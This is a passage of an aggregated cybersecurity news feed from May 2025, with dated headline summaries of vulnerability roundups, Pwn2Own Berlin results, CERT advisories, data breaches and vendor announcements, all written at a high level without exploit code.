Fortinet products, including FortiVoice, FortiNDR, FortiRecorder, and FortiCamera. Remote, unauthenticated attackers could potentially exploit the flaw by sending specially crafted HTTP requests – specifically, maliciously crafted cookies – to the affected device’s HTTP/HTTPS administrative interface. CVE-2025-22462 is a 9.8-rated bypass vulnerability impacting on-premises deployments of Ivanti Neurons for IT Service Management (ITSM). The flaw could allow remote, unauthenticated attackers to gain full administrative access to affected systems through a low-complexity attack without needing valid credentials or prior access. CVE-2025-3462 and CVE-2025-3463 are high- and critical-severity vulnerabilities in ASUS DriverHub, a utility for updating drivers on ASUS motherboards. CVE-2025-3462 stems from weak origin validation, potentially allowing attackers to bypass security checks by crafting malicious domains that mimic the official ASUS update site. CVE-2025-3463 involves improper certificate validation, potentially allowing untrusted sources to manipulate the update process. To exploit these flaws, an attacker could trick users into visiting a malicious website, which then sends forged requests to the local DriverHub service, causing it to silently download and execute malicious payloads with administrative privileges. ICS Vulnerabilities Of 31 ICS vulnerabilities examined by Cyble last week, flaws from Hitachi Energy and Pixmeo stood out. The Pixmeo OsiriX MD vulnerabilities stand out due to their potential impact on the healthcare sector. OsiriX MD is a widely used DICOM viewer and medical image processing software deployed in hospitals and radiology centers for viewing, analyzing, and managing medical imaging data such as CT, MRI, and PET scans. Versions 14.0.1 (Build 2024-02-28) and earlier are vulnerable to critical issues, including Use After Free and Cleartext Transmission of Sensitive Information. Successful exploitation of these flaws could allow an attacker to cause memory corruption, leading to a denial-of-service (DoS) condition that disrupts clinical operations or to credential theft, potentially granting unauthorized access to sensitive patient data or medical systems. Cyble researchers have identified publicly exposed OsiriX instances accessible over the internet, making them potentially attractive targets for attackers and raising concerns about healthcare data security and operational resilience. Multiple critical and high-severity vulnerabilities have been identified in Hitachi Energy's Service Suite, specifically affecting versions 9.8.1.3 and prior. Service Suite is a comprehensive software platform used in the energy sector to manage maintenance, engineering, and network systems operations. The disclosed CVEs include significant issues such as HTTP Request Smuggling, Use of Less Trusted Sources, Integer Overflows, Out-of-Bounds Access, and Sensitive Information Exposure. These flaws could potentially lead to unauthorized access, data leakage, service disruption, or remote code execution. Given the software's role in operational technology environments, prompt patching is crucial for preventing exploitation, maintaining system integrity, and safeguarding critical infrastructure from potential cyber threats that could disrupt energy delivery and reliability. Conclusion The week of May 12-16 saw an unusually high number of critical vulnerabilities, partly due to vendors reporting vulnerabilities on Patch Tuesday, the second Tuesday of the month. The significant threat posed by the vulnerabilities underscores the importance of cybersecurity best practices and good cyber hygiene, which can help guard against a wide range of threats. Those security practices include comprehensive, risk-based vulnerability management; segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization. To access all Cyble reports, click here. The post The Week in Vulnerabilities: IT, ICS Fixes Prioritized by Cyble appeared first on Cyble.

https://cyble.com/blog/the-week-in-vulnerabilities-it-prioritized-by-cyble/
Cisco Expands Commitment to France with Strategic Initiatives and Global AI Hub
2025-05-19T10:00:00Z | 1747648800

Cisco announces initiatives in France focused on digital upskilling, energy-efficient AI-ready infrastructure and the AI startup ecosystem.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-expands-commitment-to-france-with-strategic-initiatives-and-global-ai-hub.html
Cisco Expands Commitment to France with Strategic Initiatives and Global AI Hub
2025-05-19T10:00:00Z | 1747648800

Cisco announces initiatives in France focused on digital upskilling, energy-efficient AI-ready infrastructure and the AI startup ecosystem.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-expands-commitment-to-france-with-strategic-initiatives-and-global-ai-hub.html
TransUnion Responds to New Buy Now, Pay Later Legislation
2025-05-19T09:27:32Z | 1747646852

Madhusudan ‘Madhu’ Kejriwal, CEO of TransUnion in the UK and Europe, comments on the new buy now, pay later legislation:“As clarity around buy now, pay later (BNPL) regulation is provided, we welcome the introduction of clear legislation for a payment method now regularly used by millions. With adoption growing across all age groups, legislation is a positive and timely step to ensure consumers receive the same protections they enjoy with other regulated credit products. “TransUnion led the way as the first UK credit reference agency to include BNPL data in consumer credit files – consequently we are in a strong position to share insight and expertise on what this means for consumers and BNPL providers alike.“Guided by our commitment to using ‘Information for Good’, we’ve worked to support both consumer protection and responsible lending, helping finance providers ensure payment plans are affordable and sustainable. “Based on our close collaboration with key clients, we believe that the vast majority of BNPL providers are committed to good customer outcomes, so our aspiration is that these regulations provide a useful lens to clarify any pending doubts.“By promoting transparency, preventing unaffordable borrowing, and providing consumers with rights when issues arise, BNPL legislation will play a vital role in driving financial inclusion and broadening access to credit.”

https://newsroom.transunion.co.uk/transunion-responds-to-new-buy-now-pay-later-legislation/
Criminal records, financial data exposed in cyber attack on Legal Aid Agency
2025-05-19T09:06:51Z | 1747645611

The UK's Legal Aid Agency has warned members of the public after a data breach exposed a "significant amount" of data, including criminal records, personal details, and financial information.

https://www.itpro.com/security/cyber-attacks/legal-aid-agency-cyber-attack-breach
ESET APT Activity Report Q4 2024–Q1 2025
2025-05-19T08:55:00Z | 1747644900

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025

https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2024-q1-2025/
Security Alert (A25-05-15): Multiple Vulnerabilities in Firefox
2025-05-19T04:00:00Z | 1747627200

Mozilla has published the advisories (MFSA2025-36, MFSA2025-37 and MFSA2025-38) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Edge Multiple Vulnerabilities
2025-05-19T03:00:00Z | 1747623600

Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure and remote code execution on the targeted system.   Note: CVE-2025-4664 is being exploited in the wild. The vulnerability assigned to this... Impact Remote Code Execution Information Disclosure System / Technologies affected Microsoft Edge version prior to 136.0.3240.76 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to version 136.0.3240.76 or later

https://www.hkcert.org/security-bulletin/microsoft-edge-multiple-vulnerabilities_20250519
OPSWAT Update - April 2025
2025-05-19T02:00:00Z | 1747620000

Welcome to the OPSWAT Update – your source for news and information on Critical Infrastructure Protection (CIP) and OPSWAT products and services.

https://www.opswat.com/blog/opswat-update-april-2025
Brand impersonation, online ads, and malicious merchants help purchase scam network prey on victims
2025-05-19T00:00:00Z | 1747612800

Access expert insights on how brand impersonation, online ads, and malicious merchants help a purchase scam network prey on victims

https://www.recordedfuture.com/blog/purchase-scam-networks-prey-on-victims
Pwn2Own Berlin 2025: Day Three Results
2025-05-17T09:40:13Z | 1747474813

Welcome to the third and final day of Pwn2Own Berlin 2025. We' start the day at $695,000 awarded for the contest. It will be interesting to see if we can breach the million dollar mark. Stay tuned for all of the results. And we are finished!! What an amazing three days of research. Today, we awarded $383,750, which brings the event total to $1,078,750! Congratulations to the STAR Labs SG team for winning Master of Pwn. They earned $$320,000 and 35 Master of Pwn points. During the event, we purchased (and disclosed) 28 unique 0-days - seven of which came from the AI category. Thanks to OffensiveCon for hosting the event, the participants for bringing their amazing research, and the vendors for acting on the bugs quickly. COLLISION - Although Angelboy (@scwuaptx) from DEVCORE Research Team successfully demonstrated their privilege escalation on Windows 11, one of the two bugs he used was known to the vendor. He still earns $11,250 and 2.25 Master of Pwn points. COLLISION - Although @namhb1, @havancuong000, and @HieuTra34558978 of FPT NightWolf successfully exploited NVIDIA Triton, the bug they used was known by the vendor (but not patched yet). They still earn $15,000 and 1.5 Master of Pwn points. SUCCESS - Former Master of Pwn winner Manfred Paul used an integer overflow to exploit Mozilla Firefox (renderer only). His excellent work earns him $50,000 and 5 Master of Pwn points. SUCCESS - Nir Ohfeld (@nirohfeld) Shir Tamari (@shirtamari) of Wiz Research used a External Initialization of Trusted Variables bug to exploit the #NVIDIA Container Toolkit. This unique bug earns them $30,000 and 3 Master of Pwn points. FAILURE - Unfortunately, the team from STAR Labs could not get their exploit of NVIDIA's Triton Inference server working within the time allotted. SUCCESS - Dung and Nguyen (@MochiNishimiya) of STARLabs used a TOCTOU race condition to escape the VM and an Improper Validation of Array Index for the Windows privilege escalation. They earn $70,000 and 9 Master of Pwn points. SUCCESS/COLLISION - Corentin BAYET (@OnlyTheDuck) from @Reverse_Tactics used two bugs to exploit ESXi, but the Use of Uninitialized Variable bug collided with a prior entry. His integer overflow was unique though, so he still earns $112,500 and 11.5 Master of Pwn points. SUCCESS - Thomas Bouzerar (@MajorTomSec) and Etienne Helluy-Lafont from Synacktiv (@Synacktiv) used a heap-based buffer overflow to exploit VMware Workstation. They earn $80,000 and 8 Master of Pwn points. SUCCESS - In the final attempt of Pwn2Own Berlin 2025, Miloš Ivanović (infosec.exchange/@ynwarcs) used a race condition bug to escalate privileges to SYSTEM on Windows 11. His fourth-round win nets him $15,000 and 3 Master of Pwn points.

https://www.thezdi.com/blog/2025/5/17/pwn2own-berlin-2025-day-three-results
Gartner®: Market Guide for Third-Party Risk Management Technology Solutions
2025-05-16T22:59:20Z | 1747436360

Organizations worldwide are facing intense pressure to meet new and evolving regulatory requirements related to third- and fourth-party risk. Regulators and stakeholders are increasingly interested in how organizations effectively manage their third-party risk activities.

https://blog.riskrecon.com/resources/reports-and-whitepapers/gartner-market-guide-for-third-party-risk-management-technology-solutions
Impact of AI on cyber threat from now to 2027
2025-05-16T20:03:59Z | 1747425839

An NCSC assessment highlighting the impacts on cyber threat from AI developments between now and 2027.

https://www.ncsc.gov.uk/report/impact-ai-cyber-threat-now-2027
2025-018: Zero-Day Vulnerabilities in Ivanti EPMM
2025-05-16T19:55:33Z | 1747425333

On May 13, 2025, Ivanti released a security advisory addressing two zero-day vulnerabilities in their EPMM products. An attacker could chain those vulnerabilities to achieve unauthenticated remote code execution on the vulnerable device. These vulnerabilities have been exploited in a limited number of cases. [New] The analysis conducted by WatchTowr provides significantly more information than the advisory issued by Ivanti in two key aspects: - WatchTowr attributes the vulnerabilities to code owned by Ivanti, whereas Ivanti asserts that they are related to third-party libraries. - Additionally, WatchTowr questions the validity of the reported authentication bypass vulnerability, disagreeing with Ivanti's assessment. CERT-EU strongly recommends applying the update as soon as possible, prioritising Internet facing devices.

https://cert.europa.eu/publications/security-advisories/2025-018/
The empire strikes back with F-bombs: AI Darth Vader goes rogue with profanity, slurs
2025-05-16T19:25:41Z | 1747423541

Fortnite AI voice trained on James Earl Jones spoke curse words and insults before patch.

https://arstechnica.com/information-technology/2025/05/the-empire-strikes-back-with-f-bombs-ai-darth-vader-goes-rogue-with-profanity-slurs/
Ransomware Is Changing Financial Services—Are You Ready?
2025-05-16T16:00:00Z | 1747411200

How complying with advancing regulations actually help protect against ransomware

https://www.security.com/expert-perspectives/ransomware-changing-financial-services
Microsoft Edge security advisory (AV25-278)
2025-05-16T14:46:17Z | 1747406777

https://cyber.gc.ca/en/alerts-advisories/microsoft-edge-security-advisory-av25-278
Zero-Day Malware First Detected by DNS Threat Intelligence
2025-05-16T14:28:43Z | 1747405723

EfficientIP’s DNS Threat Intelligence has identified a previously unknown infostealer malware actively targeting enterprise networks—undetected by all major antivirus engines and threat intelligence feeds. This zero-day malware campaign uses DNS TXT records to stealthily communicate and exfiltrate data, completely bypassing traditional endpoint and perimeter defenses. Zero-Day Malware Uncovered First by EfficientIP’s DNS Threat Intelligence The… The post Zero-Day Malware First Detected by DNS Threat Intelligence appeared first on EfficientIP.

https://efficientip.com/blog/zero-day-malware-first-detected-by-dns-threat-intelligence/
Quantum Threats Are Here – Is Your Security Already Obsolete?
2025-05-16T14:13:43Z | 1747404823

Think quantum computing is a theoretical threat on the distant horizon? Think again. It’s a real and accelerating force that is already rewriting the rules of cybersecurity, and exposing a fatal flaw in how most organizations protect their data. The post Quantum Threats Are Here – Is Your Security Already Obsolete? appeared first on Certes.

https://certes.ai/2025/05/16/quantum-threats-are-here/
Netskope Deepens Partner Ecosystem with Google’s Cloud WAN Integration
2025-05-16T14:00:00Z | 1747404000

Navigating the demands of a hyper-distributed enterprise Enterprises today operate in a hyper-distributed environment where users, devices, applications, and workloads are no longer confined within traditional corporate boundaries. Whether you’re working with remote employees, branch offices, SaaS, IaaS, or non-human form factors like robots and AI workloads, everything must securely and reliably connect to everything […] The post Netskope Deepens Partner Ecosystem with Google’s Cloud WAN Integration appeared first on Netskope.

https://www.netskope.com/blog/netskope-deepens-partner-ecosystem-with-googles-cloud-wan-integration
A Quarter of People in the UK Have Low Financial Resilience
2025-05-16T13:51:05Z | 1747403465

Research published today by the Financial Conduct Authority found that a quarter of people in the UK have low financial resilience, Madhusudan ‘Madhu’ Kejriwal, CEO of TransUnion in the UK and Europe, comments: “While more people are now digitally included and hold current accounts, a significant minority still lack the savings buffer needed to comfortably weather unexpected costs. We know that regularly monitoring your credit report can be a valuable tool to reaching financial goals, as it provides a clearer view of your overall financial picture. Credit monitoring can support financial inclusion and help people with accessing the credit that they need and better help them manage their finances and pay down any debt they may have.We are encouraged by the fact that 26 million UK customers have access to their TransUnion credit report and score via leading UK lenders and aggregators. Our Consumer Pulse research from Q1 2025 has shown that over three quarters (77%) UK adults recognise the importance of monitoring their credit score, with almost one in four (39%) monitoring their score at least once a month.Proactive engagement is key. Whether it’s checking your credit report, understanding how financial behaviours impact your score, or exploring free tools to plan for the future, the right data can help inform better decisions. That’s why we’re working with partners across the sector to ensure consumers not only have better access to credit that they need, but have the tools improve their financial understanding, so they can make informed decisions to build long-term resilience.”

https://newsroom.transunion.co.uk/a-quarter-of-people-in-the-uk-have-low-financial-resilience/
The Good, the Bad and the Ugly in Cybersecurity – Week 20
2025-05-16T13:00:14Z | 1747400414

Police disrupt cybercrime ops, malicious NPM package hides malware via Unicode, and spies leverage zero-day in enterprise messaging app.

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-20-6/
CERT-SE:s veckobrev v.20
2025-05-16T12:30:00Z | 1747398600

En händelserik vecka där Sverige har medverkat i världens största cybersäkerhetsövning LockedShields 2025, NCSC-SE har bokat 20-21 oktober för Cybersäkerhetskonferensen 2025 och MSB/CERT-SE har lanserat en ny funktion i ANTS. ANTS är vår automatiska notifieringstjänst som hjälper svenska organisationer upptäcka sårbarheter i system. Den nya funktionen innebär att ANTS flaggar om en enhet misstänks ha blivit komprometterad.

https://www.cert.se/2025/05/cert-se-veckobrev-v20.html
Järgmisel nädalal saab testida mobiiliga hääletamist
2025-05-16T12:13:17Z | 1747397597

Riigi Infosüsteemi Amet (RIA) ja riigi valimisteenistus viivad 20.–22. mail läbi mobiiltelefonidele loodud e-hääletamise rakenduse prototüübi avaliku testi. Testis saavad kasutajad rännata ajas tagasi Eesti ajalukku ning valida sündmuse, millest nad sooviksid osa saada.

https://ria.ee/uudised/jargmisel-nadalal-saab-testida-mobiiliga-haaletamist
The Future is Coming Faster than You Think
2025-05-16T12:00:00Z | 1747396800

We think we’re on the verge of one of the single largest transformations in product innovation velocity in history.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/the-future-is-coming-faster-than-you-think.html
US healthcare data breaches are out of control – over 400 million patient records have been exposed in the last two years
2025-05-16T11:30:00Z | 1747395000

There's been a huge surge in the number of healthcare data breaches in recent years

https://www.itpro.com/security/data-breaches/us-healthcare-data-breaches-are-out-of-control-over-400-million-patient-records-have-been-exposed-in-the-last-two-years
Prescription for disaster: Sensitive patient data leaked in Ascension breach
2025-05-16T11:25:43Z | 1747394743

Ascension, one of the largest private healthcare companies in the United States, has confirmed that the personal data of some 437,329 patients has been exposed following an attack by cybercriminals. Read more in my article on the Fortra blog.

https://www.fortra.com/blog/prescription-disaster-sensitive-patient-data-leaked-ascension-hack
Everything we know about the Dior cyber attack so far
2025-05-16T10:50:00Z | 1747392600

The luxury fashion brand told ITPro that no sensitive financial information has been compromised in the attack.

https://www.itpro.com/security/cyber-attacks/everything-we-know-about-the-dior-cyber-attack-so-far
The FBI says hackers are using AI voice clones to impersonate US government officials
2025-05-16T10:30:00Z | 1747391400

The campaign uses AI voice generation to send messages pretending to be from high-ranking figures

https://www.itpro.com/security/the-fbi-says-hackers-are-using-ai-voice-clones-to-impersonate-us-government-officials
Proofpoint bolsters Microsoft 365 protection with Hornetsecurity acquisition
2025-05-16T10:06:35Z | 1747389995

Proofpoint said the acquisition will “significantly enhance” its human-centric security capabilities

https://www.itpro.com/business/acquisition/proofpoint-bolsters-microsoft-365-protection-with-hornetsecurity-acquisition
Ransomware in OT Environments: A 2025 Perspective
2025-05-16T10:00:55Z | 1747389655

Operational technology (OT) ransomware attacks have escalated to crisis levels in 2025. A recent FBI report revealed a 9% increase in ransomware attacks targeting U.S. infrastructure in 2024, with more than 1,300 complaints linked to critical sectors like energy, water, and transportation. The numbers reflect a growing and dangerous trend of attackers shifting their focus […] The post Ransomware in OT Environments: A 2025 Perspective appeared first on RunSafe Security.

https://runsafesecurity.com/blog/how-protect-yourself-ransomware-attack/
Pwn2Own Berlin 2025: Day Two Results
2025-05-16T09:17:17Z | 1747387037

Welcome to the second day of our first ever Pwn2OwnBerlin. Yesterday, we awarded $260,000 for some amazing research. Today looks to be even better, with more AI on the line, plus SharePoint and VMware ESXi. As always, we’ll be updating this blog with results as we have them. And that wraps up Day Two! We awarded $435,000, which brings the contest total to $695,000. With a third day still to come, there’s a very real chance we could reach the $1,000,000 threshold. The research demonstrated includes 20 unique 0-days. STAR Labs has a commanding lead in the Master of Pwn points, and it seems unlikely anyone will catch them. Tune in tomorrow to find out! COLLISION - Mohand Acherir & Patrick Ventuzelo (@pat_ventuzelo) of FuzzingLabs (@fuzzinglabs) exploited #NVIDIA Triton, but the exploit they used was known by the vendor (but unpatched). They still earn $15,000 and 1.5 Master of Pwn points. SUCCESS - Dinh Ho Anh Khoa of Viettel Cyber Security combined an auth bypass and an insecure deserialization bug to exploit Microsoft SharePoint. He earns $100,000 and 10 Master of Pwn points. SUCCESS - Nguyen Hoang Thach of STARLabs SG used a single integer overflow to exploit #VMware ESXi - a first in Pwn2Own history. He earns $150,000 and 15 Master of Pwn points. SUCCESS - Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) from Palo Alto Networks used an Out-of-Bounds Write to exploit Mozilla Firefox. They earn $50,000 and 5 Master of Pwn points. SUCCESS - The second full win in the AI category goes to Benny Isaacs (@benny_isaacs), Nir Brakha, Sagi Tzadik (@sagitz_) of Wiz Research as they leveraged a UAF to exploit Redis. They earn $40,000 and 4 Master of Pwn points. FAILURE - Unfortunately, Sina Kheirkhah of Summoning Team could not get his exploit of SharePoint working within the time allotted. SUCCESS - In the first full win against the NVIDIS Triton Inference server, Ho Xuan Ninh (@Xuanninh1412) and Tri Dang (@trichimtrich) from Qrious Secure used a four bug chain to exploit #NVIDIA Triton. Their unique work earns them $30,000 and 3 Master of Pwn points. SUCCESS - Viettel Cyber Security (@vcslab) used an OOB Write for their Guest-to-Host escape on Oracle VirtualBox. They earn themselves $40,000 and 4 Master of Pwn points. SUCCESS - Gerrard Tai of STAR Labs SG Pte. Ltd used a Use-After-Free bug to escalate privileges on Red Hat Enterprise Linux. His third-round win earns them $10,000 and 2 Master of Pwn points. FAILURE - Unfortunately, Sina Kheirkhah of Summoning Team could not get his exploit of Oracle VirtualBox working within the time allotted.

https://www.thezdi.com/blog/2025/5/16/pwn2own-berlin-2025-day-two-results
Threat Group Assessment: Muddled Libra (Updated May 16, 2025)
2025-05-16T08:16:37Z | 1747383397

Muddled Libra continues to evolve. From social engineering to adaptation of new technologies, significant time is spent breaking down organizational defenses. The post Threat Group Assessment: Muddled Libra (Updated May 16, 2025) appeared first on Unit 42.

https://unit42.paloaltonetworks.com/muddled-libra/
Cyber Weather, April 2025
2025-05-16T07:51:09Z | 1747381869

In the early part of the month, the cyber security climate was mild and spring-like, although occasional showers in the form of scams and phishing attempts did cause some haze. The storm clouds of data breaches and leaks that loomed in March receded during April, although the overall outlook remained rainy.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2025
Cyber Weather, April 2025
2025-05-16T07:51:09Z | 1747381869

In the early part of the month, the cyber security climate was mild and spring-like, although occasional showers in the form of scams and phishing attempts did cause some haze. The storm clouds of data breaches and leaks that loomed in March receded during April, although the overall outlook remained rainy.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2025
United States Patent Office Grants Clavister Patent for AI-Based Cybersecurity
2025-05-16T07:32:35Z | 1747380755

16 May 2025 – Örnsköldsvik, Sweden – Clavister, a European leader in cybersecurity for mission-critical applications, today announced that the United States Patent and Trademark Office (USPTO) has officially granted… Read more The post United States Patent Office Grants Clavister Patent for AI-Based Cybersecurity appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/united-states-patent-office-grants-clavister-patent-for-ai-based-cybersecurity/
Cyble Detects 200 Billion Files Exposed in Cloud Buckets
2025-05-16T07:32:31Z | 1747380751

Cyble’s ODIN vulnerability search tool has detected more than 200 billion exposed files in cloud buckets across seven major cloud providers.  The 200 billion exposed files reflect the sheer scale of accidental data exposure on the internet, data that’s often left publicly accessible due to misconfigurations. The files include data ranging from documents and credentials to source code and internal backups.  The ODIN platform scans cloud buckets at scale and classifies exposed content using machine learning-based detection. ODIN has also detected more than 660,000 exposed buckets, in addition to more than 91 million exposed hosts.  Cyble monitors and classifies these datasets to help organizations reduce their attack surface.  Exposed Credentials, Source Code and Confidential Files  Filtering the ODIN data for just three sensitive data types yielded millions of credentials, source code and confidential files (images below; URLs and identifying information redacted).  Filtering for “source code” and the Go language, for example, yielded 5.6 million results (image below).  Filtering for env credentials returned 110,000 results:  And a search for confidential files returned more than 1.6 million results:  Those are just three of the several sensitive data types detected by ODIN’s machine learning-based scanning.  Cloud Storage Bucket Access and Configuration  Exposed cloud storage buckets have only grown in number since Cyble reported more than 500,000 exposed buckets in August 2024.  Managing access to cloud storage buckets can be challenging even for the largest organizations, and misconfigured cloud buckets are all too common. While cloud storage is typically private by default, it can quickly get complicated when you start sharing objects or resources.  Google, for example, recommends taking a Uniform approach, which allows you to use Identity and Access Management (IAM) alone to manage permissions. The Fine-grained approach of combining IAM and Access Control Lists (ACLs) would allow you to specify access on a per-object basis, but because of the need to coordinate between the two different access control systems, there is a bigger risk of unintentional data exposure, and auditing also becomes more complicated. One way to balance access and risk is to use managed folders, which allow fine-grained access to specific groups of objects with a bucket.  Amazon S3 resources are private by default. S3 offers several access management tools, the most common of which is an access policy, which can be set based on resources such as a bucket, or identity through an IAM identity.  Microsoft recommends using Microsoft Entra ID and managed identities to authorize access to Azure Storage.  Detecting Exposed Cloud Storage Files and Buckets  Without a service like Cyble’s Cloud Security Posture Management (CSPM) platform, it can be difficult to detect misconfigurations and exposed cloud storage buckets. While usage logs are one possible option, routine audits of bucket access permissions are a critically important practice.  Data loss prevention (DLP) tools can help you identify where you have sensitive data stored that needs to be protected, and other important cloud storage security practices include object encryption and retention and lifecycle management.  Cyble’s ODIN service can help organizations detect exposed cloud storage buckets and files, and dark web monitoring tools such as those from Cyble can give organizations an early warning when data and credential leaks do occur so they can respond faster and take action to secure accounts and data.  The post Cyble Detects 200 Billion Files Exposed in Cloud Buckets  appeared first on Cyble.

https://cyble.com/blog/detects-200-billion-files-exposed-in-cloud-buckets/
High Threat Security Alert (A25-05-12): Multiple Vulnerabilities in Microsoft Edge
2025-05-16T04:00:00Z | 1747368000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-05-13): Multiple Vulnerabilities in Ivanti Endpoint Manager Mobile
2025-05-16T04:00:00Z | 1747368000

Ivanti has released security advisory to address multiple vulnerabilities in Ivanti Endpoint Manager Mobile.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-14): Vulnerability in SonicWall SMA1000 Series Products
2025-05-16T04:00:00Z | 1747368000

SonicWall released a security advisory to address vulnerability in SonicWall SMA1000 Series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Ivanti Endpoint Manager Mobile Authentication Bypass and Remote Code Execution Vulnerability (CVE-2025-4427/CVE-2025-4428)
2025-05-16T03:40:04Z | 1747366804

Recently, NSFOCUS CERT detected that Ivanti issued a security advisory to fix the authentication bypass and remote code execution vulnerabilities (CVE-2025-4427/CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM). At present, both 2 vulnerabilities have been found to be exploited in the wild. Please take measures to protect them as soon as possible. CVE-2025-4427: An authentication bypass […] The post Ivanti Endpoint Manager Mobile Authentication Bypass and Remote Code Execution Vulnerability (CVE-2025-4427/CVE-2025-4428) appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/ivanti-endpoint-manager-mobile-authentication-bypass-and-remote-code-execution-vulnerability-cve-2025-4427-cve-2025-4428/
Ivanti EPMM Zero-Days: Reconnaissance to Exploitation
2025-05-16T00:00:00Z | 1747353600

Two critical Ivanti zero-days (CVE-2025-4427 and CVE-2025-4428) are now being actively exploited after a surge in scanning activity last month. When chained together, these vulnerabilities enable unauthenticated remote code execution on Ivanti Endpoint Manager Mobile systems.

https://www.greynoise.io/blog/ivanti-epmm-zero-days-reconnaissance-exploitation
Lawmakers push for reauthorization of cyber information sharing bill as deadline looms
2025-05-15T23:27:10Z | 1747351630

Despite support from the Trump administration, reauthorization of the legislation faces some obstacles, including a tight timeline and the fact that it is unclear who in House and Senate leadership will champion the legislation at a time when many other urgent competing bills are vying for attention.

https://therecord.media/lawmakers-push-for-reauthorization-information-sharing-bill
O que é um ataque cibernético? Tipos e prevenção
2025-05-15T21:41:12Z | 1747345272

A segurança digital se tornou uma prioridade inegociável. Com o avanço da tecnologia, surgem também novas ameaças digitais e uma das mais perigosas é o ataque cibernético. Empresas, governos e até mesmo usuários comuns estão constantemente na mira de criminosos digitais que buscam explorar vulnerabilidades. Mas afinal, o que é ataque cibernético, quais são os […] The post O que é um ataque cibernético? Tipos e prevenção appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/o-que-e-um-ataque-cibernetico/
World's First Fleet of 100 5G-A Autonomous Electric Mining Trucks Launched at Yimin Mine
2025-05-15T20:30:00Z | 1747341000

A fleet of 100 Huaneng Ruichi autonomous electric mining trucks, the first of its kind in the world, has officially entered operation at the Yimin open-pit mine in Inner Mongolia, China.

//www.huawei.com/en/news/2025/5/yimin-huaneng-intelligent-mining
PAN-SA-2025-0009 Chromium: Monthly Vulnerability Update (May 2025) (Severity: HIGH)
2025-05-15T20:00:00Z | 1747339200

PAN-SA-2025-0009 Chromium: Monthly Vulnerability Update (May 2025) (Severity: HIGH)

https://security.paloaltonetworks.com/PAN-SA-2025-0009
Breachforums Boss to Pay $700k in Healthcare Breach
2025-05-15T19:56:51Z | 1747339011

In what experts are calling a novel legal outcome, the 22-year-old former administrator of the cybercrime community Breachforums will forfeit nearly $700,000 to settle a civil lawsuit from a health insurance company whose customer data was posted for sale on the forum in 2023. Conor Brian Fitzpatrick, a.k.a. "Pompompurin," is slated for resentencing next month after pleading guilty to access device fraud and possession of child sexual abuse material (CSAM).

https://krebsonsecurity.com/2025/05/breachforums-boss-to-pay-700k-in-healthcare-breach/
Locating hidden brand impersonation infrastructure using Silent Push Web Scanner
2025-05-15T19:32:29Z | 1747337549

Challenge: Gathering actionable web content and DNS data at scale  Our customer – a large U.S. retail organization – was facing difficulties scanning and analysing vast amounts of public web content and DNS data, in the hunt for brand impersonation domains and portal spoofing infrastructure.  The company has a global presence in the retail space, […] The post Locating hidden brand impersonation infrastructure using Silent Push Web Scanner  appeared first on Silent Push.

https://www.silentpush.com/blog/locating-hidden-brand-impersonation-infrastructure-using-silent-push-web-scanner/
Email Security Showdown: ICES vs. SEG
2025-05-15T18:45:11Z | 1747334711

The post Email Security Showdown: ICES vs. SEG appeared first on Open Systems.

https://www.open-systems.com/blog/email-security-showdown-ices-vs-seg/
FTC’s Ferguson tells lawmakers agency won’t regulate AI until after problems occur
2025-05-15T18:08:29Z | 1747332509

His remarks echo recent comments Commissioner Melissa Holyoak made in her personal capacity during a speech at a privacy conference, but are a more significant indicator of the agency’s new position on the issue given that he was speaking to lawmakers on behalf of the agency.

https://therecord.media/ftc-ferguson-wont-regulate-ai-until-problems-arise
Xoxo to Prague
2025-05-15T18:01:53Z | 1747332113

In this week’s newsletter, Thor inspects the LockBit leak, finding $10,000 “security tips,” ransom negotiations gone wrong and a rare glimpse into the human side of cybercrime.

https://blog.talosintelligence.com/xoxo-to-prague/
Cloud Network Security Challenges and How to Solve Them
2025-05-15T18:00:00Z | 1747332000

As more businesses have migrated to the cloud, the question of how to protect digital assets in these dynamic, distributed environments has become critical. Cloud network security is no longer just an IT concern—it’s a strategic imperative.   While cloud providers offer built-in security tools, relying on native solutions alone can leave gaps in protection, especially in complex multi-cloud or hybrid environments. From data breaches to... Read more » The post Cloud Network Security Challenges and How to Solve Them appeared first on Plixer.

https://www.plixer.com/blog/cloud-network-security-challenges/
